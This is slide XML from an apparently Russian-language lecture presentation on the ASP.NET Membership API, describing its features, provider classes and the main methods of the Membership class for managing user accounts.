              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" b="1" smtClean="0"/>
              <a:t>Интерфейс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" smtClean="0"/>
              <a:t>Membership API</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" b="1"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smtClean="0"/>
              <a:t>Учетные записи - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Membership</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Возникают стандартные задачи управления учетными записями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Для их решения создано </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>membership API. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Это среда основанная на существующей инфраструктуре </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Forms Authentication. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>При использовании этого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>не требуется реализовывать страницы подключения и хранилище учетных записей (login pages и credential storage).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Membership API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>предоставляет возможность проверять и хранить регистрационные данные пользователей. Т.е. помогает управлять аутентификацией пользователей.</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274638"/>
            <a:ext cx="8229600" cy="777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Возможности </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>ASP.Net Membership API</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1196975"/>
            <a:ext cx="8229600" cy="5429250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Способность создавать и удалять пользователей программно или с помощью конфигурационной утилиты.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Возможность восстанавливать пароли, с возможностью автоматической отправки восстановленного пароля пользователю по </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>e-mail (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>если задан </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>адрес</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Возможность автоматически генерировать для пользователей пароли, если эти пользователи создаются программно. Эти пароли могут автоматически отсылаться пользователям, если задан адрес </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>mail.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Возможность находить пользователей в БД и получать список всех пользователей и их данные. Это необходимо для обычных задач управления, таких как назначение роли пользователя с помощью интерфейса управления или для создания статистики о количестве пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>приложения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Имеется набор специальных ЭУ для создания </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>страниц подключения (login pages) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>страниц регистрации новых пользователей (registration pages) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>Для отображения состояния подключения и различных представлений для пользователей прошедших и не прошедших аутентификацию.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Уровень абстракции для приложения, чтобы оно не зависело от используемого хранилища данных с помощью классов провайдеров членства (membership provider classes). Вся функциональность </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>работает независимо от базового хранилища данных, которое может быть заменено на другой тип без изменения кода. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>По умолчанию, membership API использует БД SQL Server Express для хранения описания пользователей и их ролей.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Example: Login control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="530225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Building a login page now consists of:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4318000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10245" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="2159000"/>
            <a:ext cx="8178800" cy="40544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ru-RU" smtClean="0"/>
              <a:t>Архитектура </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Membership API</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93187" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="16032" t="18338" r="13086" b="11784"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="1268413"/>
            <a:ext cx="7345363" cy="5430837"/>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274638"/>
            <a:ext cx="8229600" cy="922337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Основные класс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Membership API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1196975"/>
            <a:ext cx="8291512" cy="315913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" i="1" smtClean="0"/>
              <a:t>Определены в пространстве имен - System.Web.Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="119896" name="Group 88"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="468313" y="1692275"/>
          <a:ext cx="8424862" cy="4694238"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2212975"/>
                <a:gridCol w="6211887"/>
              </a:tblGrid>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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Класс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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Описание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5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Membership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Основной класс для работы с membership API. Включает методы для управления пользователями (users), проверки пользователей (validating users) и изменения паролей пользователей.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2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MembershipUser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Соответствует одной учетной записи пользователя в в хранилище membership API. Объект данного класса содержит всю информацию, о данном пользователе и создается с помощью метода GetUser класса Membership.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8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MembershipUserCollection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Коллекция зарегистрированных пользователей. Объект данного класса можно получить с помощью метода GetAllUsers класса Membership.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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Membership провайдеры</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="122910" name="Group 30"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="468313" y="1628775"/>
          <a:ext cx="8229600" cy="2249488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2092325"/>
                <a:gridCol w="6137275"/>
              </a:tblGrid>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Класс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000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Описание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charset="0"/>
                        </a:rPr>
                        <a:t>SqlMembershipProvider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charset="0"/>
                        </a:rPr>
                        <a:t>Реализация класса MembershipProvider, который работает с БД SQL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4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charset="0"/>
                        </a:rPr>
                        <a:t>ActiveDirectoryMembershipProvider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smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Реализация класса MembershipProvider, который работает с Active Directory.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sz="4000" b="1" smtClean="0"/>
              <a:t>Статический класс Membership</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Методы класса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t> выполняют следующие базовые операции:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Создание новых пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Удаление существующих пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Обновление информации существующих пользователей </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Получение списка всех пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Получение полной информации для заданного пользователя</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Проверка регистрационных данных пользователя в хранилище данных</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68313" y="188913"/>
            <a:ext cx="8229600" cy="777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Основные методы класса Membership</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1125538"/>
            <a:ext cx="8569325" cy="5516562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>GetUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>- возвращает</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> MembershipUser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>объект, который представляет текущего пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Вызывайте этот метод всегда, когда нужен доступ к учетной записи текущего пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>ValidateUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– Проверяет верны ли введенные пользователем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>user name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> password. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Используется для проверки регистрации пользователя, если создается свой собственный элемент управления </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>login.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>FindUsersByEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– получить коллекцию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>пользователей, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>адреса которых содержат заданный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>адрес</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>FindUsersByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>- получить коллекцию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>пользователей,  имена которых совпадают с заданным шаблоном</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>GeneratePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– создать случайным образом пароль заданной длины</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>GetAllUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– получить коллекцию всех зарегистрированных в базе данных пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>GetNumberOfUsersOnline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– получить всех подключенных в данны1 момент пользователей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>GetUserNameByEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>– получить имя пользователя у которого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>адрес совпадает с заданным</a:t>
